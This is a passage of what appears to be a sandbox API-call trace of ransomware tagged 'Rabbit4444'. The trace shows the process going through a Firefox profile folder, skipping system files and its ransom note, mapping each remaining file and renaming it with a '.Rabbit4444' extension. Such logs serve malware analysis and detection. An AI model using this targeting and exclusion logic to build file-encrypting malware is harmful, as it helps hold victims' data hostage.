(HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0050.691] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.691] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0050.691] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.692] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0050.692] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.692] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0050.692] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14200235704) returned 1 [0050.692] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0050.692] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0050.692] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.692] CloseHandle (hObject=0x298) returned 1 [0050.692] CloseHandle (hObject=0x278) returned 1 [0050.692] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\addons.json.Rabbit4444") returned 96 [0050.692] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\addons.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\addons.json"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\addons.json.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\addons.json.rabbit4444"), dwFlags=0x1) returned 1 [0050.692] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfea98376, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfea98376, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfea98376, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x291, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="addonStartup.json.lz4", cAlternateFileName="ADDONS~1.LZ4")) returned 1 [0050.692] lstrcmpiW (lpString1="addonStartup.json.lz4", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.693] lstrcmpiW (lpString1="addonStartup.json.lz4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.693] lstrcmpiW (lpString1="addonStartup.json.lz4", lpString2="Rabbit4444.exe") returned -1 [0050.693] lstrcmpiW (lpString1="addonStartup.json.lz4", lpString2=".") returned 1 [0050.693] lstrcmpiW (lpString1="addonStartup.json.lz4", lpString2="..") returned 1 [0050.693] lstrcmpiW (lpString1="addonStartup.json.lz4", lpString2="windows") returned -1 [0050.693] lstrcmpiW (lpString1="addonStartup.json.lz4", lpString2="bootmgr") returned -1 [0050.693] lstrcmpiW (lpString1="addonStartup.json.lz4", lpString2="pagefile.sys") returned -1 [0050.693] lstrcmpiW (lpString1="addonStartup.json.lz4", lpString2="boot") returned -1 [0050.693] lstrcmpiW (lpString1="addonStartup.json.lz4", lpString2="ids.txt") returned -1 [0050.693] lstrcmpiW (lpString1="addonStartup.json.lz4", lpString2="NTUSER.DAT") returned -1 [0050.693] lstrcpyW (in: lpString1=0x130ebcc, lpString2="addonStartup.json.lz4" | out: lpString1="addonStartup.json.lz4") returned="addonStartup.json.lz4" [0050.693] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\addonStartup.json.lz4", dwFileAttributes=0x0) returned 1 [0050.694] lstrlenW (lpString="addonStartup.json.lz4") returned 21 [0050.694] lstrlenW (lpString="Rabbit4444") returned 10 [0050.694] lstrcmpiW (lpString1="p.json.lz4", lpString2="Rabbit4444") returned -1 [0050.694] lstrlenW (lpString=".dll") returned 4 [0050.694] lstrcmpiW (lpString1=".lz4", lpString2=".dll") returned 1 [0050.694] lstrlenW (lpString=".lnk") returned 4 [0050.694] lstrcmpiW (lpString1=".lz4", lpString2=".lnk") returned 1 [0050.694] lstrlenW (lpString=".ini") returned 4 [0050.694] lstrcmpiW (lpString1=".lz4", lpString2=".ini") returned 1 [0050.694] lstrlenW (lpString=".sys") returned 4 [0050.694] lstrcmpiW (lpString1=".lz4", lpString2=".sys") returned -1 [0050.694] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\addonStartup.json.lz4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\addonstartup.json.lz4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.694] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.694] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14200477310) returned 1 [0050.694] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=657) returned 1 [0050.694] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0050.694] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0050.694] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5a0, lpName=0x0) returned 0x298 [0050.695] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5a0) returned 0x70000 [0050.696] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.696] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0050.696] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.696] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0050.696] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.696] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0050.696] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.696] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0050.696] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14200723495) returned 1 [0050.697] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0050.697] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0050.697] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.697] CloseHandle (hObject=0x298) returned 1 [0050.697] CloseHandle (hObject=0x278) returned 1 [0050.697] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\addonStartup.json.lz4.Rabbit4444") returned 106 [0050.697] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\addonStartup.json.lz4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\addonstartup.json.lz4"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\addonStartup.json.lz4.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\addonstartup.json.lz4.rabbit4444"), dwFlags=0x1) returned 1 [0050.697] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143f0f49, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x143f0f49, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xb81085d6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AlternateServices.txt", cAlternateFileName="ALTERN~1.TXT")) returned 1 [0050.697] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.697] lstrcmpiW (lpString1="AlternateServices.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.697] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="Rabbit4444.exe") returned -1 [0050.698] lstrcmpiW (lpString1="AlternateServices.txt", lpString2=".") returned 1 [0050.698] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="..") returned 1 [0050.698] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="windows") returned -1 [0050.698] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="bootmgr") returned -1 [0050.698] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="pagefile.sys") returned -1 [0050.698] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="boot") returned -1 [0050.698] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="ids.txt") returned -1 [0050.698] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="NTUSER.DAT") returned -1 [0050.698] lstrcpyW (in: lpString1=0x130ebcc, lpString2="AlternateServices.txt" | out: lpString1="AlternateServices.txt") returned="AlternateServices.txt" [0050.698] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\AlternateServices.txt", dwFileAttributes=0x0) returned 1 [0050.698] lstrlenW (lpString="AlternateServices.txt") returned 21 [0050.698] lstrlenW (lpString="Rabbit4444") returned 10 [0050.699] lstrcmpiW (lpString1="rvices.txt", lpString2="Rabbit4444") returned 1 [0050.699] lstrlenW (lpString=".dll") returned 4 [0050.699] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0050.699] lstrlenW (lpString=".lnk") returned 4 [0050.699] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0050.699] lstrlenW (lpString=".ini") returned 4 [0050.699] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0050.699] lstrlenW (lpString=".sys") returned 4 [0050.699] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0050.699] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd843d8c, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfd843d8c, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x200a4780, ftLastWriteTime.dwHighDateTime=0x1d31cd6, nFileSizeHigh=0x0, nFileSizeLow=0x44669, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="blocklist.xml", cAlternateFileName="BLOCKL~1.XML")) returned 1 [0050.699] lstrcmpiW (lpString1="blocklist.xml", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.699] lstrcmpiW (lpString1="blocklist.xml", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.699] lstrcmpiW (lpString1="blocklist.xml", lpString2="Rabbit4444.exe") returned -1 [0050.699] lstrcmpiW (lpString1="blocklist.xml", lpString2=".") returned 1 [0050.699] lstrcmpiW (lpString1="blocklist.xml", lpString2="..") returned 1 [0050.699] lstrcmpiW (lpString1="blocklist.xml", lpString2="windows") returned -1 [0050.699] lstrcmpiW (lpString1="blocklist.xml", lpString2="bootmgr") returned -1 [0050.699] lstrcmpiW (lpString1="blocklist.xml", lpString2="pagefile.sys") returned -1 [0050.699] lstrcmpiW (lpString1="blocklist.xml", lpString2="boot") returned -1 [0050.699] lstrcmpiW (lpString1="blocklist.xml", lpString2="ids.txt") returned -1 [0050.699] lstrcmpiW (lpString1="blocklist.xml", lpString2="NTUSER.DAT") returned -1 [0050.699] lstrcpyW (in: lpString1=0x130ebcc, lpString2="blocklist.xml" | out: lpString1="blocklist.xml") returned="blocklist.xml" [0050.699] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\blocklist.xml", dwFileAttributes=0x0) returned 1 [0050.699] lstrlenW (lpString="blocklist.xml") returned 13 [0050.699] lstrlenW (lpString="Rabbit4444") returned 10 [0050.699] lstrcmpiW (lpString1="cklist.xml", lpString2="Rabbit4444") returned -1 [0050.699] lstrlenW (lpString=".dll") returned 4 [0050.699] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0050.699] lstrlenW (lpString=".lnk") returned 4 [0050.700] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0050.700] lstrlenW (lpString=".ini") returned 4 [0050.700] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0050.700] lstrlenW (lpString=".sys") returned 4 [0050.700] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0050.700] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\blocklist.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\blocklist.xml"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.700] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.700] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14201057929) returned 1 [0050.700] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=280169) returned 1 [0050.700] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0050.700] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0050.700] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x44970, lpName=0x0) returned 0x298 [0050.701] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x44970) returned 0x70000 [0050.710] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.710] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0050.710] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.710] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0050.710] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.710] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0050.710] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.710] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0050.710] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14202089036) returned 1 [0050.710] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0050.710] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0050.710] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.713] CloseHandle (hObject=0x298) returned 1 [0050.713] CloseHandle (hObject=0x278) returned 1 [0050.713] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\blocklist.xml.Rabbit4444") returned 98 [0050.713] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\blocklist.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\blocklist.xml"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\blocklist.xml.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\blocklist.xml.rabbit4444"), dwFlags=0x1) returned 1 [0050.713] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe9b352a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfe9b352a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfe9b352a, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bookmarkbackups", cAlternateFileName="BOOKMA~1")) returned 1 [0050.713] lstrcmpiW (lpString1="bookmarkbackups", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.713] lstrcmpiW (lpString1="bookmarkbackups", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.713] lstrcmpiW (lpString1="bookmarkbackups", lpString2="Rabbit4444.exe") returned -1 [0050.713] lstrcmpiW (lpString1="bookmarkbackups", lpString2=".") returned 1 [0050.713] lstrcmpiW (lpString1="bookmarkbackups", lpString2="..") returned 1 [0050.713] lstrcmpiW (lpString1="bookmarkbackups", lpString2="windows") returned -1 [0050.714] lstrcmpiW (lpString1="bookmarkbackups", lpString2="bootmgr") returned -1 [0050.714] lstrcmpiW (lpString1="bookmarkbackups", lpString2="pagefile.sys") returned -1 [0050.714] lstrcmpiW (lpString1="bookmarkbackups", lpString2="boot") returned -1 [0050.714] lstrcmpiW (lpString1="bookmarkbackups", lpString2="ids.txt") returned -1 [0050.714] lstrcmpiW (lpString1="bookmarkbackups", lpString2="NTUSER.DAT") returned -1 [0050.714] lstrcpyW (in: lpString1=0x130ebcc, lpString2="bookmarkbackups" | out: lpString1="bookmarkbackups") returned="bookmarkbackups" [0050.714] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf63e8 [0050.714] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb4) returned 0x10a2f0 [0050.714] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf63f0 | out: ListHead=0xf68b0, ListEntry=0xf63f0) returned 0xf63b0 [0050.714] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe645e15, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfe645e15, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xb81085d6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cert8.db", cAlternateFileName="")) returned 1 [0050.714] lstrcmpiW (lpString1="cert8.db", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.714] lstrcmpiW (lpString1="cert8.db", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.714] lstrcmpiW (lpString1="cert8.db", lpString2="Rabbit4444.exe") returned -1 [0050.714] lstrcmpiW (lpString1="cert8.db", lpString2=".") returned 1 [0050.714] lstrcmpiW (lpString1="cert8.db", lpString2="..") returned 1 [0050.714] lstrcmpiW (lpString1="cert8.db", lpString2="windows") returned -1 [0050.714] lstrcmpiW (lpString1="cert8.db", lpString2="bootmgr") returned 1 [0050.714] lstrcmpiW (lpString1="cert8.db", lpString2="pagefile.sys") returned -1 [0050.714] lstrcmpiW (lpString1="cert8.db", lpString2="boot") returned 1 [0050.714] lstrcmpiW (lpString1="cert8.db", lpString2="ids.txt") returned -1 [0050.714] lstrcmpiW (lpString1="cert8.db", lpString2="NTUSER.DAT") returned -1 [0050.714] lstrcpyW (in: lpString1=0x130ebcc, lpString2="cert8.db" | out: lpString1="cert8.db") returned="cert8.db" [0050.714] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\cert8.db", dwFileAttributes=0x0) returned 1 [0050.723] lstrlenW (lpString="cert8.db") returned 8 [0050.723] lstrlenW (lpString="Rabbit4444") returned 10 [0050.723] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0050.723] lstrlenW (lpString=".dll") returned 4 [0050.723] lstrcmpiW (lpString1="8.db", lpString2=".dll") returned 1 [0050.723] lstrlenW (lpString=".lnk") returned 4 [0050.723] lstrcmpiW (lpString1="8.db", lpString2=".lnk") returned 1 [0050.723] lstrlenW (lpString=".ini") returned 4 [0050.723] lstrcmpiW (lpString1="8.db", lpString2=".ini") returned 1 [0050.723] lstrlenW (lpString=".sys") returned 4 [0050.723] lstrcmpiW (lpString1="8.db", lpString2=".sys") returned 1 [0050.723] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\cert8.db" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\cert8.db"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.724] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.724] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14203435726) returned 1 [0050.724] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=65536) returned 1 [0050.724] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0050.724] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0050.724] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10300, lpName=0x0) returned 0x298 [0050.725] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10300) returned 0x70000 [0050.729] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.729] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0050.729] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.729] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0050.729] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.729] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0050.729] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.729] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0050.729] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14203975895) returned 1 [0050.729] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0050.729] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0050.729] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.730] CloseHandle (hObject=0x298) returned 1 [0050.730] CloseHandle (hObject=0x278) returned 1 [0050.730] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\cert8.db.Rabbit4444") returned 93 [0050.730] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\cert8.db" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\cert8.db"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\cert8.db.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\cert8.db.rabbit4444"), dwFlags=0x1) returned 1 [0050.730] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x400ce751, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0xc7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="compatibility.ini", cAlternateFileName="COMPAT~1.INI")) returned 1 [0050.730] lstrcmpiW (lpString1="compatibility.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.730] lstrcmpiW (lpString1="compatibility.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.731] lstrcmpiW (lpString1="compatibility.ini", lpString2="Rabbit4444.exe") returned -1 [0050.731] lstrcmpiW (lpString1="compatibility.ini", lpString2=".") returned 1 [0050.731] lstrcmpiW (lpString1="compatibility.ini", lpString2="..") returned 1 [0050.731] lstrcmpiW (lpString1="compatibility.ini", lpString2="windows") returned -1 [0050.731] lstrcmpiW (lpString1="compatibility.ini", lpString2="bootmgr") returned 1 [0050.731] lstrcmpiW (lpString1="compatibility.ini", lpString2="pagefile.sys") returned -1 [0050.731] lstrcmpiW (lpString1="compatibility.ini", lpString2="boot") returned 1 [0050.731] lstrcmpiW (lpString1="compatibility.ini", lpString2="ids.txt") returned -1 [0050.731] lstrcmpiW (lpString1="compatibility.ini", lpString2="NTUSER.DAT") returned -1 [0050.731] lstrcpyW (in: lpString1=0x130ebcc, lpString2="compatibility.ini" | out: lpString1="compatibility.ini") returned="compatibility.ini" [0050.731] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\compatibility.ini", dwFileAttributes=0x0) returned 1 [0050.731] lstrlenW (lpString="compatibility.ini") returned 17 [0050.731] lstrlenW (lpString="Rabbit4444") returned 10 [0050.731] lstrcmpiW (lpString1="bility.ini", lpString2="Rabbit4444") returned -1 [0050.731] lstrlenW (lpString=".dll") returned 4 [0050.731] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0050.731] lstrlenW (lpString=".lnk") returned 4 [0050.731] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0050.731] lstrlenW (lpString=".ini") returned 4 [0050.731] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0050.731] 